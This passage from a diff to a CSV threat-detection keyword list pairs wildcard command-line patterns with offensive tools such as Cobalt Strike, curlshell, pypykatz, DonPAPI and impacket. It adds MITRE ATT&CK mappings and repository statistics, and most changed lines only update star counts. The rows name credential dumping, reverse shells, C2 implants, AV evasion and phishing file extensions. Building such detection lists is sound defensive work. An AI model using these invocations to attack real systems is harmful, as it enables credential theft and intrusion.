T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" @@ -2382,7 +2382,7 @@ "*.mobile.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mysql.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.news.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*.pdf.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.pdf.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.pdf.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2412,8 +2412,8 @@ "*.pptx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.pptx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.ps1 -Base *OU=*DC=* -Credentials * -Server *","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*.py -credz *.txt * ","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*.py -credz *.txt * ","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*.py -k * -f *.bat -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" @@ -2429,21 +2429,21 @@ "*.py -k * -f *.xlsm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py rekall *.dmp* -t 0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*.py * --fake-server*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*.py * --fake-server*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*.py * amsi -disable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*.py * amsi -enable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*.py * --brop *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" -"*.py * --burp *","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*.py * --burp *","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" "*.py * -debug -dnstcp*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" -"*.py * -k -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*.py * -k -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*.py * --teamserver *","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py *.cs cs ms*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*.py *.exe *NormalDLL.dll*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" -"*.py *0.0.0.0*--serve-forever*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*.py *--dependabot-workaround*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py *0.0.0.0*--serve-forever*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py *--dependabot-workaround*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*.py 127.0.0.1 50050 logtracker password*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*.py --certificate *.pem --private-key *.pem --listen-port *","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py --certificate *.pem --private-key *.pem --listen-port *","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*.py --client ftp --username * --password * --ip * --datatype ssn*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py --client https --data-size * --ip * --datatype cc*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" @@ -2456,12 +2456,12 @@ "*.py discover -H domain_list.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py enum -H * -U *.txt -P *.txt -*.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py -f *.exe -e -m 4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" -"*.py --file *.ps1 --server amsi*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*.py --file *.ps1 --server amsi*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py -k * -f *.doc -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py lock -H * -u administrator -d *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*.py -method BOTH -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" -"*.py -method LDAPS -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" -"*.py --server amsi --file *.exe*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*.py -method BOTH -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*.py -method LDAPS -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*.py --server amsi --file *.exe*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py spray -ep *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*.py* --payload *.ps1*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 